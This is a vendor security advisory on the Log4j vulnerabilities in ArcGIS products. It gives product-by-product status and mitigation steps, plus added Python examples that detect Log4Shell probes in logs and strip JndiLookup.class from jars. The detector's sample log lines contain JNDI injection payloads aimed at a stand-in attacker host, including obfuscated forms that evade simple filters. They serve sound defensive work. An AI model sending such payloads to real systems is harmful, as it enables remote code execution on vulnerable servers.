13 December 2021
Esri has released the following critical ArcGIS Software Security Alert information on these Log4j library vulnerabilities:
- CVE-2021-44228 – Log4j 2.x JNDILookup RCE fix 1 – Disclosed 12/9/21 – Critical
- CVE-2021-45046 – Log4j 2.x JNDILookup fix 2 – Disclosed 12/14/21 – Critical
- CVE-2021-4104 – Log4j 1.2 JMSAppender – Disclosed 12/14/21 – High
- CVE-2021-45105 – Log4j 2.x Context Lookups DoS – Disclosed 12/18/21 – High
- CVE-2021-44832 – Log4j 2.x JDBCAppender – Disclosed 12/28/21 – Medium
ArcGIS and Apache Log4j Vulnerabilities
Last updated 4/02/2022
The Cybersecurity & Infrastructure Security Agency (CISA) provides a useful summary of Log4j vulnerability guidance that customers may want to reference in addition to our product-specific recommendations. Two aspects your organization should consider implementing are alerting and blocking mechanisms for this issue. To help ease implementing the CISA-recommended blocking mechanism of a Web Application Firewall (WAF) with Esri products, we have a Web Application Filter Rules guide located within the customer-accessible documents area of the ArcGIS Trust Center.
Note that the mitigation measures are in alignment with Emergency Directive 22-02, Mitigate Apache Log4j Vulnerability.
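The alerting side of the CISA guidance needs a detector that is not fooled by the nested-lookup tricks attackers use to hide the `${jndi:` string. The following is an added example for this page, not Esri's WAF rule set or detection logic: it URL-decodes each access-log line, collapses the common Log4j obfuscation lookups (`${lower:…}`, `${upper:…}`, `${env:X:-…}`, `${::-…}`) the way Log4j itself would resolve them, and then looks for a JNDI lookup. The log lines, hostnames and addresses are constructed for the example.

```python
"""Detect Log4Shell (CVE-2021-44228 / CVE-2021-45046) probe strings in access-log lines.

Added example; not Esri's code.  Assumes Apache/IIS-style access-log lines where the
attacker-controlled data sits in the request line or User-Agent field.
"""
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

# Constructed sample lines (no real traffic).  Line 0 is benign; the rest carry a JNDI
# lookup, plain or obfuscated, in the User-Agent or query string.
SAMPLE_LINES = [
    '10.0.0.5 - - [13/Dec/2021:10:01:02 +1100] "GET /arcgis/rest/services HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.6 - - [13/Dec/2021:10:01:03 +1100] "GET /arcgis/rest/info HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.7 - - [13/Dec/2021:10:01:04 +1100] "GET /arcgis/ HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:L}dap://attacker.example/b}"',
    '10.0.0.8 - - [13/Dec/2021:10:01:05 +1100] "GET /arcgis/ HTTP/1.1" 200 512 "-" "${${env:NONE:-j}ndi:rmi://attacker.example/c}"',
    '10.0.0.9 - - [13/Dec/2021:10:01:06 +1100] "GET /arcgis/?x=%24%7Bjndi%3Adns%3A%2F%2Fattacker.example%2Fd%7D HTTP/1.1" 200 512 "-" "curl/7.79"',
    '10.0.0.10 - - [13/Dec/2021:10:01:07 +1100] "GET /arcgis/ HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://attacker.example/e}"',
]

# Log4j resolves nested lookups innermost-first, so attackers hide "jndi" inside lookups
# that evaluate to plain text.  Each rule below undoes one such trick.
_OBFUSCATION_RULES = [
    # ${lower:J} -> j, ${upper:j} -> J
    (re.compile(r"\$\{\s*lower\s*:([^${}]*)\}", re.I), lambda m: m.group(1).lower()),
    (re.compile(r"\$\{\s*upper\s*:([^${}]*)\}", re.I), lambda m: m.group(1).upper()),
    # ${env:UNDEFINED:-j}, ${sys:UNDEFINED:-j}, ${::-j}: an undefined lookup with a
    # ":-default" suffix evaluates to the default text
    (re.compile(r"\$\{[^${}:]*:[^${}:]*:-([^${}]*)\}"), lambda m: m.group(1)),
]
# The thing we are actually looking for once the obfuscation is gone; group 1 is the scheme.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z0-9+.-]*)[^}]*\}", re.I)


def normalize(text: str, max_rounds: int = 20) -> str:
    """Undo URL encoding (including double encoding), then collapse obfuscation lookups
    until the text stops changing."""
    for _ in range(3):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    for _ in range(max_rounds):
        before = text
        for pattern, repl in _OBFUSCATION_RULES:
            text = pattern.sub(repl, text)
        if text == before:
            break
    return text


def find_jndi(line: str) -> Optional[Tuple[str, str]]:
    """Return (normalized JNDI lookup, lower-cased scheme) if the line carries one, else None."""
    m = _JNDI.search(normalize(line))
    if not m:
        return None
    return m.group(0), m.group(1).lower()


def scan(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Scan lines and return (line index, scheme, normalized lookup) for each hit."""
    hits = []
    for i, line in enumerate(lines):
        found = find_jndi(line)
        if found:
            hits.append((i, found[1], found[0]))
    return hits


if __name__ == "__main__":
    for idx, scheme, payload in scan(SAMPLE_LINES):
        print(f"line {idx}: {scheme} lookup -> {payload}")
```

A hit means a probe reached the server, not that it succeeded; correlate it with outbound LDAP, RMI or DNS connections from the ArcGIS host for the same window. The same normalization can be reused in a WAF rule if the platform supports nested substitution, but a plain `${jndi:` signature alone misses every obfuscated line above except the first.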
ArcGIS Enterprise
Several ArcGIS Enterprise components contain the vulnerable Log4j library; however, there is no known exploit available at this time for any version of a base ArcGIS Enterprise deployment (including the ArcGIS Server, Portal for ArcGIS, and ArcGIS Data Store components) or of stand-alone ArcGIS Server.
Esri has evaluated the potential impact of CVE-2021-45105, an infinite recursion denial-of-service attack against Log4j, in Portal for ArcGIS, ArcGIS Server, and ArcGIS Data Store and determined that those software components do not use the pattern layouts necessary for attackers to exploit the vulnerability.
Out of an abundance of caution, Esri has created Log4Shell mitigation scripts and strongly recommends applying them to all installations of ArcGIS Enterprise and ArcGIS Server, whatever the version. The scripts remove the JndiLookup class, which is the only mitigation recommended by Apache Log4j that does not require updating the Log4j version. The scripts have been validated for versions 10.6 and above; they should also work on older versions of ArcGIS Enterprise and ArcGIS Server. Separate detailed instructions and scripts are available for:
- ArcGIS Server – For ArcGIS GIS Server, ArcGIS GeoAnalytics Server, and ArcGIS Image Server
- Portal for ArcGIS
- ArcGIS Data Store
- ArcGIS GeoEvent Server
- ArcGIS Workflow Manager Server
- ArcGIS GeoEnrichment Server
Notes:
- As the scripts require stopping and restarting ArcGIS Enterprise components' services, we recommend running the scripts outside of business hours or during the scheduled maintenance window.
- After applying the mitigation scripts, the Log4j jars on these systems will still report the vulnerable version numbers, so tools that key on the version string alone will still flag them; however, the vulnerable JndiLookup class has been removed.
- Base ArcGIS Enterprise components do not use the Log4j 1.2 JMSAppender (CVE-2021-4104) or the Log4j 2.x JDBCAppender (CVE-2021-44832) and are therefore not vulnerable to those CVEs.
- The ArcGIS Web Adaptor does not use Log4j core and is therefore not vulnerable.
- ArcGIS Enterprise security patches will be released throughout Q1 2022, with more specific dates posted here as the effort progresses.
- Customers are strongly encouraged to use the supplied scripts rather than waiting for additional patch availability.
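Because the version number stays the same after the scripts run, the only reliable check is whether `org/apache/logging/log4j/core/lookup/JndiLookup.class` is still inside each log4j-core jar. The following is an added example, not Esri's mitigation script: it walks an install tree for log4j-core jars, reports the version and whether the class is present, decides whether the JNDI message-lookup fix is missing, and rewrites a jar without the class (the same effect as Apache's `zip -q -d` advice). The jar layout assumed is the upstream Log4j 2.x one; the jars built by `make_sample_jar` and the paths under `run_demo` are constructed stand-ins, not real ArcGIS files.

```python
"""Find log4j-core jars, check for JndiLookup.class, and remove it the way the Esri
mitigation scripts do.  Added example; not Esri's script.  Assumes the upstream Log4j 2.x
jar layout and reads the version from the jar's pom.properties or its file name.
"""
import io
import os
import re
import tempfile
import zipfile
from typing import Dict, List, Optional

JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
_VERSION_IN_NAME = re.compile(r"log4j-core-(\d+(?:\.\d+)+)\.jar$", re.I)


def find_log4j_core_jars(root: str) -> List[str]:
    """Walk an install tree (for example the ArcGIS Server directory) for log4j-core jars."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            low = name.lower()
            if low.startswith("log4j-core") and low.endswith(".jar"):
                hits.append(os.path.join(dirpath, name))
    return sorted(hits)


def inspect_jar(path: str) -> Dict[str, object]:
    """Report the jar's version and whether JndiLookup.class is still packaged in it."""
    version: Optional[str] = None
    with zipfile.ZipFile(path) as zf:
        names = set(zf.namelist())
        if POM_PROPERTIES in names:
            for line in zf.read(POM_PROPERTIES).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
    if version is None:  # no pom.properties: fall back to the file name
        m = _VERSION_IN_NAME.search(os.path.basename(path))
        version = m.group(1) if m else None
    return {"path": path, "version": version, "jndi_lookup_present": JNDI_LOOKUP in names}


def needs_mitigation(report: Dict[str, object]) -> bool:
    """True when the class is present and the release still performs JNDI message lookups.
    Apache's fixed releases: 2.16.0 (2.12.2 on the Java 7 line, 2.3.1 on the Java 6 line);
    those still ship JndiLookup.class, so presence alone is not the whole answer."""
    if not report["jndi_lookup_present"]:
        return False
    version = report["version"]
    if not version:
        return True  # class present, version unknown: treat as exposed
    parts = tuple(int(p) for p in re.findall(r"\d+", str(version))[:3])
    parts = parts + (0,) * (3 - len(parts))
    if parts[:2] == (2, 12):
        return parts < (2, 12, 2)
    if parts[:2] == (2, 3):
        return parts < (2, 3, 1)
    return parts < (2, 16, 0)


def remove_jndi_lookup(path: str) -> bool:
    """Rewrite the jar without JndiLookup.class (same effect as `zip -q -d <jar> <class>`).
    Stop the service holding the jar open first.  Returns True if the class was removed."""
    buf = io.BytesIO()
    with zipfile.ZipFile(path) as src:
        if JNDI_LOOKUP not in src.namelist():
            return False
        with zipfile.ZipFile(buf, "w") as dst:
            for info in src.infolist():
                if info.filename != JNDI_LOOKUP:
                    dst.writestr(info, src.read(info.filename))
    tmp = path + ".tmp"
    with open(tmp, "wb") as fh:
        fh.write(buf.getvalue())
    os.replace(tmp, path)  # atomic swap so a crash cannot leave a truncated jar behind
    return True


def make_sample_jar(path: str, version: str) -> None:
    """Constructed stand-in for a log4j-core jar: fake class entries plus pom.properties."""
    with zipfile.ZipFile(path, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        zf.writestr(POM_PROPERTIES, f"version={version}\ngroupId=org.apache.logging.log4j\n")
        zf.writestr("org/apache/logging/log4j/core/Logger.class", b"\xca\xfe\xba\xbe")
        zf.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe")


def run_demo() -> Dict[str, object]:
    """Build two constructed jars under a temp tree, mitigate the old one, return the reports."""
    with tempfile.TemporaryDirectory() as root:
        old = os.path.join(root, "ArcGIS", "Server", "framework", "lib", "log4j-core-2.11.2.jar")
        new = os.path.join(root, "ArcGIS", "Portal", "lib", "log4j-core-2.17.1.jar")
        for p, v in ((old, "2.11.2"), (new, "2.17.1")):
            os.makedirs(os.path.dirname(p), exist_ok=True)
            make_sample_jar(p, v)
        found = [os.path.relpath(p, root) for p in find_log4j_core_jars(root)]
        before = inspect_jar(old)
        removed = remove_jndi_lookup(old)
        after = inspect_jar(old)
        return {
            "found": found,
            "old_before": before, "old_needs_mitigation_before": needs_mitigation(before),
            "removed": removed, "removed_again": remove_jndi_lookup(old),
            "old_after": after, "old_needs_mitigation_after": needs_mitigation(after),
            "new_needs_mitigation": needs_mitigation(inspect_jar(new)),
        }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

Point `find_log4j_core_jars` at the real install directories and use `inspect_jar` as the post-mitigation verification: the `version` field will still read 2.11.x on an unpatched install, but `jndi_lookup_present` should be `False` after the Esri scripts have run. Use the scripts themselves, not `remove_jndi_lookup`, on production systems; the function is here to show what the mitigation actually does to the jar.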
The list of frequently asked questions regarding the execution of mitigation scripts is available in the following blog.
ArcGIS Notebook Server
The product consists of two parts, the underlying framework and a Docker container image:
- The underlying framework does not contain Log4j, except in version 10.7.x of the product, whose bundled Log4j does NOT include the vulnerable JMSAppender class and is therefore NOT vulnerable to the CVEs in this announcement.
- The Docker container image contains Log4j; however, to execute that component a person would first need to be granted permissions to the notebook container, so Log4j does not present additional RCE risk in this configuration. Patches for the Docker container images will be made available over time.
ArcGIS Monitor
ArcGIS Monitor does not contain Log4j and is therefore not vulnerable to these CVEs.
ArcGIS Online
Though a Log4j exploit has not been identified for ArcGIS Online, out of an abundance of caution, patching and updates were completed to eliminate the vulnerable code from this FedRAMP authorized SaaS offering.
ArcMap
ArcMap does not include Log4j and is therefore not vulnerable to these CVEs. See the Desktop Extensions section if utilizing optional, separately installed extensions.
ArcGIS Pro
All ArcGIS Pro versions under General Availability support contain Log4j, but are not known to be exploitable as the software does not listen for remote traffic. ArcGIS Pro includes Log4j by default to support two functional areas:
ArcGIS Pro GeoAnalytics Desktop Tools
- The underlying Log4j component does NOT include the vulnerable JMSAppender class and is therefore NOT vulnerable to the CVEs in this announcement.
- Esri will update the version of Log4j through normal maintenance patches once the interfaces required to support Spark are available in Log4j 2.17.x or later.
- Though not known to be exploitable, users can delete the vulnerable Log4j-core jar file from installs of ArcGIS Pro, found here: <ProInstall>/ArcGIS/Pro/bin/Python/envs/arcgispro-py3/Lib/site-packages/saspy/java/iomclient/
- The above action will also disable use of the two Geoprocessing tools SAS to Table and Table to SAS.
- ArcGIS Pro 2.9.1 addresses the two critical Log4j CVEs (CVE-2021-44228 and CVE-2021-45046) for this component by updating to Log4j 2.16.
- ArcGIS Pro 2.7.5 and 2.8.5 address the Log4j CVEs for this component by updating to Log4j 2.17.1.
See the Desktop Extensions section below if utilizing optional, separately installed extensions.
Desktop Extensions
Below is a summary of optional (non-default) extensions and their vulnerability status:
ArcGIS Pro Data Interoperability Extension
- This product utilizes components from Safe Software that contain Log4j; the vendor states they are confident their implementation is not susceptible to CVE-2021-44228.
- Safe Software recommends that customers who remain concerned about the presence of the unpatched Log4j version remove the risk by updating the Log4j components to the currently patched Log4j version, 2.17.0. Files to update for the Data Interoperability Extension are located at two locations; please update each of the five Log4j files in each location below as specified by Safe Software:
- <DataInterOpExtInstall>/ArcGIS/Data Interoperability for ArcGIS Pro/plugins
ArcMap Data Interoperability Extension
- The underlying Log4j component does NOT include the vulnerable JMSAppender class and is therefore NOT vulnerable to the CVEs in this announcement.
- Esri will be updating the version of log4j through normal maintenance patches targeting the Data Interoperability Extension.
License Manager
This product utilizes components from Flexera, and Esri does NOT include the vulnerable example files referenced by Flexera in their Log4j statement. Log4j is not included with Esri's License Manager, which is therefore NOT vulnerable to the CVEs in this announcement.
Esri Geoportal Server
This open-source product was updated to version 2.65 on December 17 to resolve the Log4j issues; please upgrade to this latest release.
Esri Australia Managed Cloud Services
In response to this vulnerability, a new ruleset has been provided by AWS and enabled as part of the emergency change for all clients by the Esri Australia Security Incident Response Team. This is in addition to the AWS Web Application Firewall that had been deployed to all publicly exposed clients as part of Esri Australia’s security hardening in 2019/2020. The Esri Australia Cloud Services team is currently testing Esri’s Log4Shell mitigation scripts for Enterprise components — ArcGIS Server (including GeoEvent), Portal for ArcGIS, and Data Store — to be applied to all ArcGIS installations. Due to the additional mitigations and the potential for impact on the service provided, a member of Managed Cloud Services will be in touch to discuss any further changes.
If you have any questions or concerns, please contact Esri Australia Technical Support via My Esri, support@esriaustralia.com.au or 1800 447 111.